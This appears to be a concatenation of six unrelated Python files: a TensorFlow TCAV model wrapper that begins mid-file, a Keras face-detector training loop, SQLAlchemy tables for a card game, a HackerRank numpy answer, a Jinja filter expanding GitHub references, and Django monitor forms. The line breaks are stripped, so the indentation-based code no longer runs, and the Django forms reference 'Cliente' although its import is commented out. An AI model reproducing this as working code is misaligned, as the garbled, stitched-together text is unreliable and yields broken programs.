self.bottlenecks_tensors = self.get_bottleneck_tensors_mobilenet( scope='MobilenetV2') # Construct gradient ops. g = tf.compat.v1.get_default_graph() self._make_gradient_tensors() self.model_name = 'MobilenetV2_public' @staticmethod def get_bottleneck_tensors_mobilenet(scope): """Add Inception bottlenecks and their pre-Relu versions to endpoints dict.""" graph = tf.compat.v1.get_default_graph() bn_endpoints = {} for op in graph.get_operations(): if 'add' in op.name and 'gradients' not in op.name and 'add' == op.name.split( '/')[-1]: name = op.name.split('/')[-2] bn_endpoints[name] = op.outputs[0] return bn_endpoints class KerasModelWrapper(ModelWrapper): """ ModelWrapper for keras models By default, assumes that your model contains one input node, one output head and one loss function. Computes gradients of the output layer in respect to a CAV. Args: sess: Tensorflow session we will use for TCAV. model_path: Path to your model.h5 file, containing a saved trained model. labels_path: Path to a file containing the labels for your problem. It requires a .txt file, where every line contains a label for your model. You want to make sure that the order of labels in this file matches with the logits layers for your model, such that file[i] == model_logits[i] """ def __init__( self, sess, model_path, labels_path, ): self.sess = sess super(KerasModelWrapper, self).__init__() self.import_keras_model(model_path) self.labels = tf.io.gfile.GFile(labels_path).read().splitlines() # Construct gradient ops. Defaults to using the model's output layer self.y_input = tf.compat.v1.placeholder(tf.int64, shape=[None]) self.loss = self.model.loss_functions[0](self.y_input, self.model.outputs[0]) self._make_gradient_tensors() def id_to_label(self, idx): return self.labels[idx] def label_to_id(self, label): return self.labels.index(label) def import_keras_model(self, saved_path): """Loads keras model, fetching bottlenecks, inputs and outputs.""" self.ends = {} self.model = tf.keras.models.load_model(saved_path) self.get_bottleneck_tensors() self.get_inputs_and_outputs_and_ends() def get_bottleneck_tensors(self): self.bottlenecks_tensors = {} layers = self.model.layers for layer in layers: if 'input' not in layer.name: self.bottlenecks_tensors[layer.name] = layer.output def get_inputs_and_outputs_and_ends(self): self.ends['input'] = self.model.inputs[0] self.ends['prediction'] = self.model.outputs[0]
from keras.layers import Conv2D, Input,MaxPool2D, Reshape,Activation,Flatten, Dense,concatenate from keras.models import Model, Sequential from keras.layers.advanced_activations import PReLU from keras.optimizers import adam from keras.utils import to_categorical import matplotlib.pyplot as plt import numpy as np import keras.backend as K import _pickle as pickle import random from keras.activations import relu from keras.losses import mean_squared_error import tensorflow as tf import gc with open(r'24\cls.imdb','rb') as fid: cls = pickle.load(fid) with open(r'24\roi.imdb', 'rb') as fid: roi = pickle.load(fid) ims_cls = [] ims_roi = [] cls_score = [] roi_score = [] for (idx, dataset) in enumerate(cls) : ims_cls.append( np.swapaxes(dataset[0],0,2)) cls_score.append(dataset[1]) for (idx,dataset) in enumerate(roi) : ims_roi.append( np.swapaxes(dataset[0],0,2)) roi_score.append(dataset[2]) ims_cls = np.array(ims_cls) ims_roi = np.array(ims_roi) cls_score = np.array(cls_score) roi_score = np.array(roi_score) one_hot_labels = to_categorical(cls_score, num_classes=2) # input = Input(shape = [12,12,3]) input = Input(shape = [24,24,3]) # change this shape to [None,None,3] to enable arbitraty shape input x = Conv2D(16,(3,3),strides=1,padding='same',name='conv1')(input) c1out = PReLU(shared_axes=[1,2],name='prelu1')(x) c1out = concatenate ([c1out,input],axis=3) c2input = MaxPool2D(pool_size=3)(c1out) x = Conv2D(32,(3,3),strides=1,padding='same',name='conv2')(c2input) c2out = PReLU(shared_axes=[1,2],name='prelu2')(x) c2out = concatenate([c2out,c2input],axis=3) c3input = MaxPool2D(pool_size=2)(c2out) x = Conv2D(64,(3,3),strides=1,padding='same',name='conv3')(c3input) c3out = PReLU(shared_axes=[1,2],name='prelu3')(x) c3out = concatenate([c3out,c3input],axis=3) x = Flatten() (c3out) x = Dense(128,name='dense1')(x) x = PReLU(shared_axes=[1],name='prelu4')(x) classifier = Dense(2, activation='softmax',name='classifier1')(x) bbox_regress = Dense(4,name='bbox1')(x) my_adam = adam(lr = 0.001) for i_train in range(80): randx=random.choice([0,1,1]) # still need to run manually on each batch # randx = 4 # randx = random.choice([ 4]) batch_size = 64 print ('currently in training macro cycle: ',i_train) if i_train ==0: model = Model([input], [classifier, bbox_regress]) # model.load_weights('model24.h5',by_name=True) bbox = model.get_layer('bbox1') bbox_weight = bbox.get_weights() classifier_dense = model.get_layer('classifier1') cls_weight = classifier_dense.get_weights() if 0 == randx: model = Model([input], [classifier]) model.get_layer('classifier1').set_weights(cls_weight) model.compile(loss='mse', optimizer=my_adam, metrics=["accuracy"]) model.fit(ims_cls, one_hot_labels, batch_size=batch_size, epochs=1) classifier_softmax = model.get_layer('classifier1') cls_weight = classifier_softmax.get_weights() if 1 == randx: model = Model([input], [bbox_regress]) model.get_layer('bbox1').set_weights(bbox_weight) model.compile(loss='mse', optimizer=my_adam, metrics=["accuracy"]) model.fit(ims_roi, roi_score, batch_size=batch_size, epochs=1) bbox_dense = model.get_layer('bbox1') bbox_weight = bbox_dense.get_weights() gc.collect() def savemodel(): model = Model([input], [classifier, bbox_regress]) model.get_layer('bbox1').set_weights(bbox_weight) model.get_layer('classifier1').set_weights(cls_weight) model.save_weights('model24.h5') savemodel()
import enum from sqlalchemy import Column, VARCHAR, Integer, Boolean, TIMESTAMP, ForeignKey, CheckConstraint from sqlalchemy.orm import relationship from sqlalchemy.sql import func from sqlalchemy.ext.hybrid import hybrid_property # local imports from .base import Base class GameStatuses(enum.Enum): """Holds info about current status""" ready = 'ready' # App/env started initiated = 'initiated' # Game initiated players_decision = 'players_decision' # Players still making card picks judge_decision = 'judge_decision' # Judge yet to choose winner end_round = 'end_round' # Round ended ended = 'ended' # Game ended class TableGames(Base): """games table - stores past game info""" __tablename__ = 'games' id = Column(Integer, primary_key=True, autoincrement=True) rounds = relationship('TableGameRounds', back_populates='game') start_time = Column(TIMESTAMP, server_default=func.now(), nullable=False) last_update = Column(TIMESTAMP, onupdate=func.now(), server_default=func.now()) end_time = Column(TIMESTAMP, nullable=True) @hybrid_property def duration(self): return self.end_time - self.start_time if self.end_time is not None else self.last_update - self.start_time class TableGameRounds(Base): """gamerounds table - stores past gameround info""" __tablename__ = 'gamerounds' id = Column(Integer, primary_key=True, autoincrement=True) game_id = Column(Integer, ForeignKey('games.id'), nullable=False) game = relationship("TableGames", back_populates='rounds') start_time = Column(TIMESTAMP, server_default=func.now(), nullable=False) end_time = Column(TIMESTAMP, nullable=True) @hybrid_property def duration(self): return self.end_time - self.start_time if self.end_time is not None else None class TablePlayerRounds(Base): """player-level game info""" __tablename__ = 'playerrounds' id = Column(Integer, primary_key=True, autoincrement=True) player_id = Column(Integer, ForeignKey('players.id'), nullable=False) player = relationship('TablePlayers', back_populates='rounds') game_id = Column(Integer, ForeignKey('games.id'), nullable=False) round_id = Column(Integer, ForeignKey('gamerounds.id'), nullable=False) score = Column(Integer, default=0, nullable=False) is_picked = Column(Boolean, default=False, nullable=False) is_judge = Column(Boolean, default=False, nullable=False) is_arp = Column(Boolean, default=False, nullable=False) is_arc = Column(Boolean, default=False, nullable=False) is_nuked_hand = Column(Boolean, default=False, nullable=False) is_nuked_hand_caught = Column(Boolean, default=False, nullable=False) class TableGameSettings(Base): """gamesettings table - """ __tablename__ = 'gamesettings' __table_args__ = ( CheckConstraint('id < 2', name='settings_row_limit1'), ) id = Column(Integer, primary_key=True, autoincrement=True) is_ping_winner = Column(Boolean, default=True, nullable=False) is_ping_judge = Column(Boolean, default=True, nullable=False) decknuke_penalty = Column(Integer, default=-3, nullable=False) judge_order_divider = Column(VARCHAR, default=':finger-wag-right:', nullable=False) last_update = Column(TIMESTAMP, onupdate=func.now())
# Problem: https://www.hackerrank.com/challenges/np-mean-var-and-std/problem # Score: 20.0 import numpy as np n,m = map(int, input().split()) my_array = np.array([input().strip().split() for _ in range(n)], int) print(np.mean(my_array, axis=1), np.var(my_array, axis=0), np.around(np.std(my_array), decimals=11), sep='\n')
import re from moban.plugins.jinja2.extensions import JinjaFilter GITHUB_REF_PATTERN = "`([^`]*?#[0-9]+)`" ISSUE = "^.*?" + GITHUB_REF_PATTERN + ".*?$" SAME_PROJ_FULL_ISSUE = "`#{3} <https://github.com/{0}/{1}/{2}/{3}>`_" DIFF_PROJ_FULL_ISSUE = "`{1}#{3} <https://github.com/{0}/{1}/{2}/{3}>`_" PULL_REQUEST = "PR" PULL = "pull" ISSUES = "issues" @JinjaFilter() def github_expand(line, name, organisation): result = re.match(ISSUE, line) if result: github_thing = result.group(1) tokens = github_thing.split("#") if len(tokens) == 4: if tokens[2] == PULL_REQUEST: tokens[2] = PULL else: tokens[2] = ISSUES elif len(tokens) == 3: if tokens[1] == PULL_REQUEST: tokens = [organisation, tokens[0], PULL, tokens[2]] else: tokens = [organisation, tokens[0], ISSUES, tokens[2]] elif len(tokens) == 2: if tokens[0] == PULL_REQUEST: tokens = [organisation, name, PULL] + tokens[1:] elif tokens[0] != "": tokens = [organisation, tokens[0], ISSUES] + tokens[1:] else: tokens = [organisation, name, ISSUES] + tokens[1:] if tokens[1] != name: reference = DIFF_PROJ_FULL_ISSUE.format(*tokens) else: reference = SAME_PROJ_FULL_ISSUE.format(*tokens) return re.sub(GITHUB_REF_PATTERN, reference, line) else: return line
# -*- encoding: utf-8 -*- from django import forms from camara_zona.models import CamaraZona #from cliente.models import Cliente from instalacion.models import Instalacion from monitor.models import Monitor class MonitorForm(forms.ModelForm): id = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) #camara_serial = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) #zona_numero = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) clientes = forms.ChoiceField(label=u'Clientes') class Meta: model = Monitor fields = '__all__' def __init__(self, *args, **kwargs): super(MonitorForm, self).__init__(*args, **kwargs) instance = getattr(self, 'instance', None) if instance and instance._id: self.fields["id"].initial = str(instance._id) self.fields["clientes"].choices = [(str(c._id), c.razon_social) for c in Cliente.objects.all().filter(cliente_estado=True)] class MonitorEditarForm(forms.ModelForm): id = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) id_cliente = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) id_instalacion_s = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) #camara_serial = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) #zona_numero = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) clientes = forms.ChoiceField(label=u'Clientes') instalaciones = forms.ChoiceField(label=u'Instalaciones') camaras_zonas = forms.ChoiceField(label=u'Camara Zonas') class Meta: model = Monitor fields = '__all__' def __init__(self, *args, **kwargs): super(MonitorEditarForm, self).__init__(*args, **kwargs) instance = getattr(self, 'instance', None) if instance and instance._id: self.fields["id"].initial = str(instance._id) self.fields["id_cliente"].initial = str(instance.id_instalacion.id_cliente._id) self.fields["clientes"].choices = [(str(c._id), c.razon_social) for c in Cliente.objects.all().filter(cliente_estado=True)] self.fields["instalaciones"].choices = [(str(c._id), c.nombre_comercial) for c in Instalacion.objects.all().filter(id_cliente=instance.id_instalacion.id_cliente._id, instalacion_estado=True)] self.fields["camaras_zonas"].choices = [(str(c._id), c.id_camara_zona) for c in CamaraZona.objects.all().filter(id_instalacion=instance.id_instalacion._id, camara_zona_estado=True)] class MonitorShowForm(forms.ModelForm): personas = forms.CharField(widget=forms.HiddenInput, required=False, initial=0) class Meta: model = Monitor fields = "__all__" def __init__(self, *args, **kwargs): super(MonitorShowForm, self).__init__(*args, **kwargs) instance = getattr(self, 'instance', None) self.fields["personas"].initial = "10"